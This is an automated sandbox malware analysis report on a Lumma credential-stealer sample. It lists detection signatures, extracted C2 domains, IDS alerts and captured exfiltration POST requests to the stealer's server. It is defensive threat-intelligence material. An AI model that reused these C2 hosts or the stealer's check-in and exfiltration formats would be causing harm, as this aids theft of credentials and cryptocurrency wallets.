Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Bootstrapper.exe

Overview

General Information

Sample name:Bootstrapper.exe
Analysis ID:1581127
MD5:ff6c56326f0ee63ca9360576a7449ff5
SHA1:0ee6aa098523f43dcd93dedaab26b7a13f37aec7
SHA256:aafa6952bb4c20240c67300a13ca97756ac5907f2abfbad9b76a6377605e3bf4
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Bootstrapper.exe (PID: 5416 cmdline: "C:\Users\user\Desktop\Bootstrapper.exe" MD5: FF6C56326F0EE63CA9360576A7449FF5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["hummskitnj.buzz", "dxkushha.com", "inherineau.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "scentniej.buzz", "rebuildeso.buzz", "screwamusresz.buzz"], "Build id": "HpOoIh--2a727a032c4d"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2502138943.00000000016BB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2480224915.00000000016DE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: Bootstrapper.exe PID: 5416JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
                Click to see the 3 entries
                No Sigma rule has matched
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T03:36:10.657013+010020283713Unknown Traffic192.168.2.449753104.21.80.1443TCP
                2024-12-27T03:36:12.842618+010020283713Unknown Traffic192.168.2.449759104.21.80.1443TCP
                2024-12-27T03:36:15.209779+010020283713Unknown Traffic192.168.2.449766104.21.80.1443TCP
                2024-12-27T03:36:18.283975+010020283713Unknown Traffic192.168.2.449775104.21.80.1443TCP
                2024-12-27T03:36:20.791685+010020283713Unknown Traffic192.168.2.449782104.21.80.1443TCP
                2024-12-27T03:36:23.820777+010020283713Unknown Traffic192.168.2.449788104.21.80.1443TCP
                2024-12-27T03:36:26.074730+010020283713Unknown Traffic192.168.2.449794104.21.80.1443TCP
                2024-12-27T03:36:28.695448+010020283713Unknown Traffic192.168.2.449801104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T03:36:11.439483+010020546531A Network Trojan was detected192.168.2.449753104.21.80.1443TCP
                2024-12-27T03:36:13.648154+010020546531A Network Trojan was detected192.168.2.449759104.21.80.1443TCP
                2024-12-27T03:36:29.471988+010020546531A Network Trojan was detected192.168.2.449801104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T03:36:11.439483+010020498361A Network Trojan was detected192.168.2.449753104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T03:36:13.648154+010020498121A Network Trojan was detected192.168.2.449759104.21.80.1443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T03:36:16.902979+010020480941Malware Command and Control Activity Detected192.168.2.449766104.21.80.1443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["hummskitnj.buzz", "dxkushha.com", "inherineau.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "prisonyfork.buzz", "scentniej.buzz", "rebuildeso.buzz", "screwamusresz.buzz"], "Build id": "HpOoIh--2a727a032c4d"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                Source: Bootstrapper.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: dxkushha.com
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.2550028350.0000000000440000.00000002.00001000.00020000.00000000.sdmpString decryptor: HpOoIh--2a727a032c4d
                Source: Bootstrapper.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49753 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49766 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49775 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49782 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49788 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49794 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49801 version: TLS 1.2
                Source: Bootstrapper.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Admin\Workspace\3927856\Project\Release\Project.pdb source: Bootstrapper.exe
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 0_2_00795070 FindFirstFileExW,std::_Timevec::_Timevec,FindNextFileW,0_2_00795070
                Source: C:\Users\user\Desktop\Bootstrapper.exeCode function: 4x nop then mov ecx, edi0_2_007C5570

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49753 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49753 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49766 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49759 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49759 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49801 -> 104.21.80.1:443
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: dxkushha.com
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Joe Sandbox ViewIP Address: 104.21.80.1 104.21.80.1
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49766 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49782 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49753 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49775 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49759 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49801 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49788 -> 104.21.80.1:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49794 -> 104.21.80.1:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dxkushha.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 86Host: dxkushha.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7HM2AQP1HVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18122Host: dxkushha.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2A1X3JYWD4641FBFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8779Host: dxkushha.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2RNF2ZJJLTQPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20408Host: dxkushha.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QU6DXMH6BWG9JUMVUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1215Host: dxkushha.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PJW7FN57LZBCQB0W8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1112Host: dxkushha.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: dxkushha.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficDNS traffic detected: DNS query: dxkushha.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dxkushha.com
                Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: Bootstrapper.exe, 00000000.00000003.2480408350.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2541980886.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542183381.00000000016D6000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.00000000016BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: Bootstrapper.exe, 00000000.00000003.2448754842.0000000002942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: Bootstrapper.exe, Bootstrapper.exe, 00000000.00000003.2480264844.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2551636305.000000000290B000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542317548.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550534910.0000000001661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dxkushha.com/
                Source: Bootstrapper.exe, 00000000.00000003.2480264844.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542317548.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502138943.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2503001835.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550534910.0000000001661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dxkushha.com/D
                Source: Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dxkushha.com/L
                Source: Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dxkushha.com/Z
                Source: Bootstrapper.exe, 00000000.00000003.2549705000.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542317548.000000000165A000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.0000000001694000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2446824381.000000000291B000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2503001835.000000000165B000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2446910419.000000000291F000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550534910.000000000165B000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2541980886.0000000001695000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550627340.0000000001695000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dxkushha.com/api
                Source: Bootstrapper.exe, 00000000.00000003.2446824381.000000000291B000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2446910419.000000000291F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dxkushha.com/apimpQ
                Source: Bootstrapper.exe, 00000000.00000003.2502138943.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502922572.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2480224915.00000000016FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dxkushha.com/apivd
                Source: Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dxkushha.com/g
                Source: Bootstrapper.exe, 00000000.00000003.2502922572.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2542382918.00000000016E0000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2502685242.00000000016BB000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2550896350.00000000016E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dxkushha.com/rG
                Source: Bootstrapper.exe, 00000000.00000002.2550534910.0000000001661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dxkushha.com/t
                Source: Bootstrapper.exe, 00000000.00000003.2541980886.00000000016FC000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2503001835.000000000167C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dxkushha.com:443/api
                Source: Bootstrapper.exe, 00000000.00000003.2394578963.0000000002963000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
                Source: Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Bootstrapper.exe, 00000000.00000003.2424014383.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394723847.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394578963.0000000002961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                Source: Bootstrapper.exe, 00000000.00000003.2394723847.0000000002935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                Source: Bootstrapper.exe, 00000000.00000003.2424014383.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394723847.000000000295A000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394578963.0000000002961000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                Source: Bootstrapper.exe, 00000000.00000003.2394723847.0000000002935000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Bootstrapper.exe, 00000000.00000003.2394197633.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394101158.000000000294C000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2394030699.000000000294E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                Source: Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                Source: Bootstrapper.exe, 00000000.00000003.2449638964.00000000089F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
